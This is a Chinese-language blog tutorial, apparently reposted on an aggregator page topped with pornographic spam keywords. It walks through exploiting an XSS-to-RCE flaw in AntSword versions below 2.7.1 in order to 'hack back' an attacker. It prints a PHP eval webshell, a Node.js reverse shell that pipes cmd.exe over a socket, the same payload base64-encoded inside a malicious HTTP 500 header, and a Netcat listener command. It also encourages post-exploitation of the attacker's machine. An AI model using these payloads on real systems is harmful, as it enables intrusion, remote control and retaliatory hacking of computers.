国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

中國(guó)蟻劍AntSword反制 RCE漏洞復(fù)現(xiàn) windows環(huán)境上反彈shell 吊打攻擊你的黑客

這篇具有很好參考價(jià)值的文章主要介紹了中國(guó)蟻劍AntSword反制 RCE漏洞復(fù)現(xiàn) windows環(huán)境上反彈shell 吊打攻擊你的黑客。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

中國(guó)蟻劍(AntSword) 是一款開(kāi)源的跨平臺(tái)網(wǎng)站管理工具,它主要面向于合法授權(quán)的滲透測(cè)試安全人員以及進(jìn)行常規(guī)操作的網(wǎng)站管理員。

WebShell

WebShell可以理解為網(wǎng)頁(yè)中的木馬程序,通過(guò)植入到你的web站點(diǎn),在web頁(yè)面上的操作,控制你的計(jì)算機(jī)操作系統(tǒng),文件,權(quán)限,任意命令執(zhí)行。

常見(jiàn)的WebShell分為大馬、小馬、一句話木馬、內(nèi)存馬等。

下面為一句話木馬的代碼展示:

# 一句話木馬
<?php @eval($_POST['pass']); ?>

中國(guó)蟻劍(AntSword)

當(dāng)你的計(jì)算機(jī)被植入了一句話木馬后,需要通過(guò)工具進(jìn)行連接,才可以方便管理,而AntSword就是連接一句話木馬工具中的其中之一,類似的工具還有:中國(guó)菜刀、哥斯拉冰蝎等。

中國(guó)蟻劍(AntSword) RCE漏洞

此漏洞在AntSword2.7.1版本上修復(fù) ,所以適用于AntSword2.7.1以下版本。

此漏洞為AntSword連接WebShell失敗時(shí)對(duì)html代碼的解析,導(dǎo)致xss漏洞,而使html代碼不在瀏覽器解析而是在服務(wù)器上解析的話需要用到nodejs,所以AntSword使用了nodejs,本文章就講解利用xss漏洞執(zhí)行并調(diào)用nodejs的庫(kù)反彈shell拿到權(quán)限

吊打黑客的場(chǎng)景

黑客在你的web服務(wù)上植入了WebShell,利用蟻劍去連接并控制了你的電腦,這時(shí)被你發(fā)現(xiàn)了電腦被控制 變的卡卡的,并且發(fā)現(xiàn)了是通過(guò)web服務(wù)里的WebShell來(lái)控制你的,想到自己磁盤(pán)里幾十G的秘密學(xué)習(xí)資料可能全部被竊取,你很不爽,你想找到這個(gè)黑客小子,絞盡腦汁想了很多辦法也無(wú)法痛快的還擊,直到你想起來(lái)以前讀到過(guò)的我這篇文章,你抱著試試看的態(tài)度去嘗試了一下,發(fā)現(xiàn)成功反向黑掉了那個(gè)黑客的電腦,于是你對(duì)這個(gè)黑客一系列的還擊計(jì)劃開(kāi)始在腦海里活蹦亂跳...

模擬環(huán)境準(zhǔn)備:

黑客ip: 192.168.31.124 系統(tǒng): win7
被攻擊的ip:192.168.31.222 系統(tǒng):win10

黑客電腦軟件:

中國(guó)蟻劍AntSword2.7.0

中國(guó)蟻劍加載器AntSword-Loader2.0.1

被攻擊電腦軟件

小皮面板Phpstudy

瑞士軍刀Netcat

被攻擊電腦web部署

  1. 安裝好phpstudy并運(yùn)行apache

antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔
  1. 打開(kāi)80端口的網(wǎng)站目錄 并放入一句話木馬WebShell文件

antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔
antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔

黑客電腦連接WebShell

antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔

此時(shí)我們作為被攻擊的電腦,可以嘗試修改WebShell的代碼

  1. 將一句話木馬代碼改為如下:

<?php header("HTTP/1.1 500 <img src=1 onerror=alert(1) />") ?>
antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔
  1. 黑客電腦重新連接一句話木馬查看效果

antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔

發(fā)現(xiàn)執(zhí)行了我們修改的代碼中的alert(1) 彈出了提示框,證明是存在xss漏洞的

利用nodejs庫(kù)編寫(xiě)payload,反彈黑客電腦的shell

使用<=AntSword2.7.0 RCE漏洞,讓黑客電腦反彈shell到被攻擊電腦的1971端口上
  1. 首先開(kāi)啟被攻擊電腦的Netcat 監(jiān)聽(tīng)端口1971

nc -Lp 1971
antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔
  1. 更改shell.php代碼

利用nodejs庫(kù)反彈shell的代碼(payload):

var net = require("net");
var cmd = require("child_process").exec("cmd.exe");
var socket = new net.Socket();
socket.connect(1971, "192.168.31.222", function(){
    socket.pipe(cmd.stdin);
    cmd.stdout.pipe(socket);
    cmd.stderr.pipe(socket);
});

以上代碼通過(guò)創(chuàng)建Socket來(lái)連接192.168.31.222(被攻擊的電腦ip) 的1971端口(Netcat監(jiān)聽(tīng)的端口)

將以上代碼進(jìn)行base64加密,加密后的密文:

dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7

通過(guò)javascript的eval函數(shù)來(lái)調(diào)用:

eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())

并替換掉我們前邊寫(xiě)的alert(1)代碼,最終寫(xiě)到shell.php中的代碼如下:

<?php header("HTTP/1.1 500 <img src=1 onerror='eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpOwp2YXIgY21kID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoImNtZC5leGUiKTsKdmFyIHNvY2tldCA9IG5ldyBuZXQuU29ja2V0KCk7CnNvY2tldC5jb25uZWN0KDE5NzEsICIxOTIuMTY4LjMxLjIyMiIsIGZ1bmN0aW9uKCl7CiAgICBzb2NrZXQucGlwZShjbWQuc3RkaW4pOwogICAgY21kLnN0ZG91dC5waXBlKHNvY2tldCk7CiAgICBjbWQuc3RkZXJyLnBpcGUoc29ja2V0KTsKfSk7`,`base64`).toString())' />") ?>
antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔
  1. 黑客電腦嘗試重新連接一句話木馬,查看效果

黑客使用蟻劍重連,在報(bào)錯(cuò)的同時(shí),反彈給了我們一個(gè)shell到Netcat監(jiān)聽(tīng)的1971端口上

antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔

利用shell執(zhí)行命令,查看信息,成功拿下黑客電腦的管理員賬號(hào),ip也對(duì)應(yīng)黑客電腦的192.168.31.124

antsword,網(wǎng)絡(luò)安全,RCE,WEBSHELL,網(wǎng)絡(luò)安全,node.js,javascript,Powered by 金山文檔

至此,你終于可以對(duì)黑客發(fā)起反擊,進(jìn)行后滲透...文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-647256.html

在該漏洞問(wèn)題被提出之后,中國(guó)蟻劍的作者在及時(shí)發(fā)布了中國(guó)蟻劍的新版本 AntSword v2.7.1+。

到了這里,關(guān)于中國(guó)蟻劍AntSword反制 RCE漏洞復(fù)現(xiàn) windows環(huán)境上反彈shell 吊打攻擊你的黑客的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • webshell管理工具-antSword(蟻劍)的安裝和管理

    webshell管理工具-antSword(蟻劍)的安裝和管理

    中國(guó)蟻劍是一款流行的網(wǎng)絡(luò)安全工具,它由中國(guó)安全研究人員研發(fā),主要用于測(cè)試和評(píng)估網(wǎng)絡(luò)的安全性。 蟻劍具有強(qiáng)大的功能,可以用于遠(yuǎn)程控制和管理服務(wù)器,包括文件管理、進(jìn)程管理、端口掃描、SQL注入、WebShell等功能。它還可以在未授權(quán)的情況下訪問(wèn)和操縱目標(biāo)系統(tǒng),

    2024年02月16日
    瀏覽(22)
  • Apache ActiveMQ RCE漏洞復(fù)現(xiàn)

    Apache ActiveMQ RCE漏洞復(fù)現(xiàn)

    1、 產(chǎn)品簡(jiǎn)介 ActiveMQ是一種開(kāi)源的基于JMS(Java Message Servie)規(guī)范的一種消息中間件的實(shí)現(xiàn),ActiveMQ的設(shè)計(jì)目標(biāo)是提供標(biāo)準(zhǔn)的,面向消息的,能夠跨越多語(yǔ)言和多系統(tǒng)的應(yīng)用集成消息通信中間件。ActiveMQ是Apache出品,最流行的,能力強(qiáng)勁的開(kāi)源消息總線。 2、 漏洞概述 Apache Act

    2024年01月22日
    瀏覽(22)
  • ThinkPHP 多語(yǔ)言模塊RCE漏洞復(fù)現(xiàn)

    ThinkPHP 多語(yǔ)言模塊RCE漏洞復(fù)現(xiàn)

    ThinkPHP,是為了簡(jiǎn)化企業(yè)級(jí)應(yīng)用開(kāi)發(fā)和敏捷WEB應(yīng)用開(kāi)發(fā)而誕生的開(kāi)源輕量級(jí)PHP框架。最早誕生于2006年初,2007年元旦正式更名為T(mén)hinkPHP,并且遵循Apache2開(kāi)源協(xié)議發(fā)布。ThinkPHP從誕生以來(lái)一直秉承簡(jiǎn)潔實(shí)用的設(shè)計(jì)原則,在保持出色的性能和至簡(jiǎn)的代碼的同時(shí),也注重易用性。并且

    2023年04月22日
    瀏覽(26)
  • 漏洞復(fù)現(xiàn)-docker-unauthorized-rce

    漏洞復(fù)現(xiàn)-docker-unauthorized-rce

    目錄 一、漏洞介紹 1.1漏洞成因 2.2環(huán)境準(zhǔn)備 二、漏洞檢測(cè) 三、漏洞利用 1.腳本利用 2.定時(shí)任務(wù)反彈shell 3. 寫(xiě)ssh公鑰獲取shell 1.1漏洞成因 ? ? ? ? docker remote API未授權(quán)訪問(wèn)漏洞,此API主要目的是取代命令執(zhí)行頁(yè)面,開(kāi)放2375監(jiān)聽(tīng)容器時(shí),會(huì)調(diào)用這個(gè)API。方便docker集群管理和擴(kuò)展

    2024年02月09日
    瀏覽(35)
  • Hessian 反序列化RCE漏洞復(fù)現(xiàn)

    Hessian 反序列化RCE漏洞復(fù)現(xiàn)

    ? ? ?Hessian是二進(jìn)制的web service協(xié)議,官方對(duì)Java、Flash/Flex、Python、C++、.NET C#等多種語(yǔ)言都進(jìn)行了實(shí)現(xiàn)。Hessian和Axis、XFire都能實(shí)現(xiàn)web service方式的遠(yuǎn)程方法調(diào)用,區(qū)別是Hessian是二進(jìn)制協(xié)議,Axis、XFire則是SOAP協(xié)議,所以從性能上說(shuō)Hessian遠(yuǎn)優(yōu)于后兩者,并且Hessian的JAVA使用方法非

    2024年02月11日
    瀏覽(34)
  • 銳捷EWEB網(wǎng)管系統(tǒng) RCE漏洞復(fù)現(xiàn)

    銳捷EWEB網(wǎng)管系統(tǒng) RCE漏洞復(fù)現(xiàn)

    ? 銳捷網(wǎng)管系統(tǒng)是由北京銳捷數(shù)據(jù)時(shí)代科技有限公司開(kāi)發(fā)的新一代基于云的網(wǎng)絡(luò)管理軟件,以“數(shù)據(jù)時(shí)代創(chuàng)新網(wǎng)管與信息安全”為口號(hào),定位于終端安全、IT運(yùn)營(yíng)及企業(yè)服務(wù)化管理統(tǒng)一解決方案。 ? Ruijie-EWEB 網(wǎng)管系統(tǒng) flwo.control.php 中的 type 參數(shù)存在命令執(zhí)行漏洞,攻擊者可利

    2024年02月03日
    瀏覽(22)
  • ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)

    ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)

    ThinkPHP3.2遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞產(chǎn)生原因是由于在業(yè)務(wù)代碼中如果對(duì)模板賦值方法assign的第一個(gè)參數(shù)可控,則導(dǎo)致模板路徑變量被覆蓋為攜帶攻擊代碼路徑,造成文件包含,代碼執(zhí)行等危害。 復(fù)現(xiàn)環(huán)境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10 一、 搭建環(huán)境: 在ThinkPHP的

    2023年04月08日
    瀏覽(21)
  • CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一個(gè)專業(yè)的企業(yè)知識(shí)管理與協(xié)同軟件,主要用于公司內(nèi)員工創(chuàng)建知識(shí)庫(kù)并建立知識(shí)管理流程,也可以用于構(gòu)建企業(yè)wiki。其使用簡(jiǎn)單,但它強(qiáng)大的編輯和站點(diǎn)管理特征能夠幫助團(tuán)隊(duì)成員之間共享信息、文檔協(xié)作、集體討論,信息推送。因此

    2024年02月16日
    瀏覽(19)
  • 【漏洞復(fù)現(xiàn)】Fastjson_1.2.47_rce

    【漏洞復(fù)現(xiàn)】Fastjson_1.2.47_rce

    感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī) 說(shuō)明 內(nèi)容 漏洞編號(hào) 漏洞名稱 Fastjson_1.2.47_遠(yuǎn)程執(zhí)行漏洞 漏洞評(píng)級(jí) 影響范圍 漏洞描述 修復(fù)方案 1.1、漏洞描述 Fastjson是阿里巴巴公司開(kāi)源的一款json解析器,其性能優(yōu)越,被廣泛應(yīng)用于各大廠商的Java項(xiàng)目

    2024年02月05日
    瀏覽(18)
  • CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一個(gè)基礎(chǔ)開(kāi)源框架,其目的是用于簡(jiǎn)化 Java 企業(yè)級(jí)應(yīng)用的開(kāi)發(fā)難度和開(kāi)發(fā)周期,2022年3月31日,VMware Tanzu發(fā)布漏洞報(bào)告,Spring Framework存在遠(yuǎn)程代碼執(zhí)行漏洞,在 JDK 9+ 上運(yùn)行的 Spring MVC 或 Spring WebFlux 應(yīng)用程序可能容易受到通過(guò)數(shù)據(jù)綁定的遠(yuǎn)程代碼執(zhí)行

    2023年04月21日
    瀏覽(26)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包